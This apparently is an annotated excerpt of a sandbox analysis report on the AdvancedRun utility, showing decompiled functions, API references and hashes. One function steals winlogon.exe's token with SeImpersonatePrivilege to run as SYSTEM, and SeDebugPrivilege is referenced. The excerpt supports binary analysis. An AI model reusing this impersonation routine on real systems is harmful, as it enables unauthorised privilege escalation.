                                                                  • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph
                                                                  [graph image not reproduced in text: basic blocks 40b2c6-40b4af (CRT entry point), calls GetModuleHandleA, __set_app_type, __p__fmode, __p__commode, __setusermatherr, _initterm, __wgetmainargs, GetStartupInfoW, exit and _cexit; blocks are marked Executed / Not Executed]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                  • String ID:
                                                                  • API String ID: 2827331108-0
                                                                  • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                  • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                  • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                  • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 90%
			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;        // receives the token handle filled in by E00401DF9
				void _v538;
				long _v540;     // WCHAR[0x104]: system directory (filled by GetSystemDirectoryW)
				void _v1066;
				char _v1068;    // WCHAR[0x104]: full path of winlogon.exe
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				WCHAR* _t48;
				long _t49;
				int _t8;
				void* _t53;
				void* _t54;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540); // GetSystemDirectoryW + wcscpy: _v540 = system directory
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) { // MAX_PATH guard: leave the target path empty if it would not fit
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48); // wcscpy + wcscat: <system dir> + "winlogon.exe"
					_pop(_t42);
				}
				_v8 = 0;
				// Obtain a token handle, presumably by locating the process that matches the
				// winlogon.exe path built above; 0 means success and _v8 then holds the handle.
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					// Enable SeImpersonatePrivilege (presumably via AdjustTokenPrivileges), then
					// impersonate the token on the calling thread. winlogon.exe runs as LocalSystem,
					// so a successful impersonation gives this thread SYSTEM context.
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError(); // propagate the Win32 error code
					}
					CloseHandle(_v8); // the impersonation stays in effect; the token handle is no longer needed
				}
				return _t49; // 0 on success, otherwise a Win32 error code
			}


                                                                  APIs
                                                                  • memset.MSVCRT ref: 00401F27
                                                                  • memset.MSVCRT ref: 00401F3F
                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                  • wcslen.MSVCRT ref: 00401F5A
                                                                  • wcslen.MSVCRT ref: 00401F69
                                                                  • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                    • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                    • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                  • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                  • API String ID: 3867304300-2177360481
                                                                  • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                  • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                  • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                  • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

• Basic blocks (node: address range, API calls → successors):
• 405: 409555-40955f → 406, 407
• 406: 409561-40956e GetModuleHandleW → 407, 410
• 410: 409570-409586 GetProcAddress → 407
• 407: 40958b-409592 → 408, 409
• 408: 409594-4095a6 GetProcessTimes
• 409: 4095a7-4095aa
                                                                  C-Code - Quality: 100%
			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				// Lazy, one-shot import resolution: 0x41c8e8 is a "lookup attempted" flag and
				// 0x41c8ec caches the resolved address (0 if kernel32 exports no such function).
				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0; // export unavailable: report failure instead of failing to load on an unresolved import
				} else {
					// The call goes through the cached pointer at 0x41c8ec; the decompiler shows it by name.
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}


                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                  • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                  • API String ID: 1714573020-3385500049
                                                                  • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                  • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                  • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                  • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

• Basic blocks (node: address range, calls → successors):
• 411: 402f31-402f78 memset, call 404ad9, wcsrchr → 414, 415
• 414: 402f7a → 415
• 415: 402f7e-402f9f wcscat → 416, 417
• 416: 402fa1-402fb2 call 404923 → 417
• 417: 402fb3-402fbd call 402fc6 → 420
• 420: 402fc2-402fc5
                                                                  C-Code - Quality: 84%
			E00402F31(void* _a4) {
				void _v530;
				long _v532;      // WCHAR[0x104]: path of this executable, rewritten to its .cfg path
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t22;
				void* _t29;
				short _t36;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532); // GetModuleFileNameW(NULL, buf, 0x104): full path of this executable
				_t15 = wcsrchr( &_v532, 0x2e); // last '.' anywhere in the path, not only in the file name
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000; // cut the extension (".exe")
				}
				wcscat( &_v532, L".cfg"); // default config file: <exe name>.cfg next to the executable
				_t18 =  *0x40fa74; // 0x4101c8: global settings block
				_t19 = _t18 + 0x5504; // WCHAR string at offset 0x5504: optional explicit config path
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19); // non-empty: presumably a bounded copy replacing the default path
					_pop(_t29);
				}
				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed; loads the settings from the chosen file
				return _t22;
			}


                                                                  APIs
                                                                  • memset.MSVCRT ref: 00402F51
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • wcsrchr.MSVCRT ref: 00402F6F
                                                                  • wcscat.MSVCRT ref: 00402F8A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                  • String ID: .cfg
                                                                  • API String ID: 776488737-3410578098
                                                                  • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                  • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                  • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                  • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%
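The two path-building steps shown in the decompiled routines above (the winlogon.exe target path with its MAX_PATH guard in E00401F04, and the <exe name>.cfg derivation in E00402F31) re-implemented as an added example. This is illustrative code written for this page, not AdvancedRun's source. It is portable C on wchar_t so it compiles and runs outside Windows; the backslash insertion, the 0x104 limit (taken from the guard in E00401F04) and the sample paths are assumptions. It also handles a case the decompiled wcsrchr logic does not distinguish: a dot inside a directory name when the file name itself has no extension.

```c
/* Added example: path handling mirroring E00401F04 and E00402F31 (illustrative,
 * not the tool's own code). Portable C on wchar_t; assumptions: '\\' separator,
 * MAX_PATH_CHARS = 0x104 as in the decompiled guard. */
#include <stddef.h>
#include <wchar.h>

#define MAX_PATH_CHARS 0x104   /* MAX_PATH, the limit used in the decompiled code */

/* Join a directory and a file name into out (capacity cap in wchar_t), inserting a
 * backslash if the directory does not already end with one. Returns 1 on success,
 * 0 if the result would not fit (mirrors the ">= 0x104" check in E00401F04). */
int join_system_path(const wchar_t *dir, const wchar_t *file, wchar_t *out, size_t cap)
{
    size_t dlen = wcslen(dir);
    size_t flen = wcslen(file);
    int need_sep = (dlen > 0 && dir[dlen - 1] != L'\\');
    size_t total = dlen + (need_sep ? 1 : 0) + flen;   /* characters, excluding NUL */

    if (cap == 0) return 0;
    out[0] = L'\0';
    if (total + 1 > cap || total + 1 > MAX_PATH_CHARS) return 0;

    wcscpy(out, dir);
    if (need_sep) wcscat(out, L"\\");
    wcscat(out, file);
    return 1;
}

/* Derive the default config path from the module path the way E00402F31 does,
 * but only strip a '.' that belongs to the final path component: the decompiled
 * code applies wcsrchr to the whole path, which would also cut
 * "C:\tools.v2\run" at ".v2". Returns 1 on success, 0 if the result would not fit. */
int derive_cfg_path(const wchar_t *module_path, wchar_t *out, size_t cap)
{
    size_t len = wcslen(module_path);
    const wchar_t *last_sep = wcsrchr(module_path, L'\\');
    const wchar_t *last_dot = wcsrchr(module_path, L'.');
    size_t stem_len;

    if (last_dot != NULL && (last_sep == NULL || last_dot > last_sep))
        stem_len = (size_t)(last_dot - module_path);   /* dot is in the file name: strip */
    else
        stem_len = len;                                /* no extension: keep everything */

    if (cap == 0) return 0;
    out[0] = L'\0';
    if (stem_len + 4 + 1 > cap || stem_len + 4 + 1 > MAX_PATH_CHARS) return 0;

    wmemcpy(out, module_path, stem_len);
    out[stem_len] = L'\0';
    wcscat(out, L".cfg");   /* same suffix the decompiled code appends */
    return 1;
}
```

Both functions leave out empty and return 0 when the bound is exceeded, which is the behaviour E00401F04 shows for the winlogon path (the buffer is left zeroed rather than truncated).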

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 35%
			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;   // WCHAR[0x2000] INI value buffer (16 KiB on the stack)
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				// Generic INI accessor for the .cfg file: _a4 selects the direction (0 = read,
				// otherwise write), _a8 = section, _a12 = key, _a16 = value object, _a20 = file path.
				_t30 = __ecx;
				E0040B550(0x4004, __ecx); // stack probe for the 0x4004-byte frame
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset(); // memset(&_v16390, 0, 0x4000) with the arguments pushed above
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed; default string at 0x40c4e8
					asm("sbb esi, esi");
					_t37 =  ~_t36; // result flag derived from the API return value
					E004051B8( &_v16392, _t34, _a16); // parse the text into the value object
				} else {
					memset(); // same arguments as above
					E0040512F(_a16,  *_t34,  &_v16392); // _snwprintf + memcpy: format the value as text
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}


                                                                  APIs
                                                                  • memset.MSVCRT ref: 00409E08
                                                                    • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                    • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                  • memset.MSVCRT ref: 00409E3B
                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0040C4E8,?,00002000,?), ref: 00409E5D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                  • String ID:
                                                                  • API String ID: 1127616056-0
                                                                  • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                  • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                  • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                  • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

• Basic blocks (node: address range, calls → successors):
• 443: 404951-404956 → 444, 445
• 444: 404958-404959 → 446
• 445: 40499e-4049a1
• 446: 40495b-404965 → 446 (loop), 447
• 447: 404967-404977 malloc → 448, 449
• 449: 404979-40497b → 450, 451
• 451: 40497d-40498a memcpy → 450
• 450: 40498d-404993 free → 448
• 448: 404994-40499d
                                                                  C-Code - Quality: 100%
                                                                  			// Grows a dynamic array: *__eax holds the current capacity, __edx the index that must fit,
                                                                  			// _a4 the element size, _a8 the growth step, *__edi the element storage.
                                                                  			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
                                                                  				void* _t8;
                                                                  				void* _t13;
                                                                  				signed int _t16;
                                                                  				void** _t21;
                                                                  				signed int _t22;
                                                                  				char* _t1; // declaration added: temporary was used below without being declared
                                                                  
                                                                  				_t21 = __edi;
                                                                  				_t22 =  *__eax;
                                                                  				if(__edx < _t22) {
                                                                  					return 0; // index already fits in the current capacity, nothing to do
                                                                  				} else {
                                                                  					_t13 =  *__edi; // old storage
                                                                  					do {
                                                                  						_t1 =  &_a8; // 0x4057e1
                                                                  						 *__eax =  *__eax +  *_t1; // capacity += growth step
                                                                  						_t16 =  *__eax;
                                                                  					} while (__edx >= _t16);
                                                                  					_t8 = malloc(_t16 * _a4); // executed
                                                                  					 *__edi = _t8;
                                                                  					if(_t22 > 0) {
                                                                  						if(_t8 != 0) {
                                                                  							memcpy(_t8, _t13, _t22 * _a4); // copy the old elements into the new block
                                                                  						}
                                                                  						free(_t13); // executed
                                                                  					}
                                                                  					return 0 |  *_t21 != 0x00000000; // nonzero when the new storage was allocated
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                  • malloc.MSVCRT ref: 0040496D
                                                                  • memcpy.MSVCRT ref: 00404985
                                                                  • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: freemallocmemcpy
                                                                  • String ID: W@
                                                                  • API String ID: 3056473165-1729568415
                                                                  • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                  • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                  • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                  • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			// Loads a DLL by an absolute path under the system directory first (avoids search-order
                                                                  			// hijacking from the current directory), falling back to the bare name only if that fails.
                                                                  			E00405436(wchar_t* _a4) {
                                                                  				WCHAR _v2050[0x3ff]; // remainder of a 1024-WCHAR path buffer; decompiler split off its first WCHAR as _v2052
                                                                  				signed short _v2052;
                                                                  				void* __esi;
                                                                  				struct HINSTANCE__* _t16;
                                                                  				WCHAR* _t18;
                                                                  
                                                                  				_v2052 = _v2052 & 0x00000000;
                                                                  				memset( &_v2050, 0, 0x7fe);
                                                                  				E00404C3C( &_v2052); // GetSystemDirectoryW + wcscpy into the buffer
                                                                  				_t18 =  &_v2052;
                                                                  				E004047AF(_t18); // append a trailing backslash
                                                                  				wcscat(_t18, _a4);
                                                                  				_t16 = LoadLibraryW(_t18); // executed
                                                                  				if(_t16 == 0) {
                                                                  					return LoadLibraryW(_a4); // fallback: default search order
                                                                  				}
                                                                  				return _t16;
                                                                  			}

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                    • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                    • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                  • wcscat.MSVCRT ref: 00405478
                                                                  • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                  • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                  • String ID:
                                                                  • API String ID: 3725422290-0
                                                                  • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                  • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                  • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                  • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                    • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                    • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                    • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                  • String ID:
                                                                  • API String ID: 4232544981-0
                                                                  • Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                  • Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
                                                                  • Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                  • Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			// Wrapper around E00408FC9 (privilege adjustment on the current process); releases the
                                                                  			// library handle that the callee stores in _v8, if any.
                                                                  			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                  				signed int _v8;
                                                                  				void* _t8;
                                                                  				void* _t13;
                                                                  
                                                                  				_v8 = _v8 & 0x00000000;
                                                                  				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
                                                                  				_t13 = _t8;
                                                                  				if(_v8 != 0) {
                                                                  					FreeLibrary(_v8);
                                                                  				}
                                                                  				return _t13;
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                    • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentErrorFreeLastLibraryProcess
                                                                  • String ID:
                                                                  • API String ID: 187924719-0
                                                                  • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                  • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                  • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                  • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 37%
                                                                  			// Calls GetModuleFileNameExW through a function pointer resolved at runtime from psapi.dll
                                                                  			// (E00409921 fills the pointer table via GetProcAddress); returns 0 if the export is absent.
                                                                  			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                  				void* __esi;
                                                                  				intOrPtr* _t6;
                                                                  				void* _t8;
                                                                  				struct HINSTANCE__** _t10;
                                                                  
                                                                  				_t10 = __eax;
                                                                  				E00409921(__eax);
                                                                  				_t6 =  *((intOrPtr*)(_t10 + 0x10)); // slot for GetModuleFileNameExW
                                                                  				if(_t6 == 0) {
                                                                  					return 0;
                                                                  				}
                                                                  				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed; hProcess, hModule = NULL, buffer, MAX_PATH
                                                                  				return _t8;
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
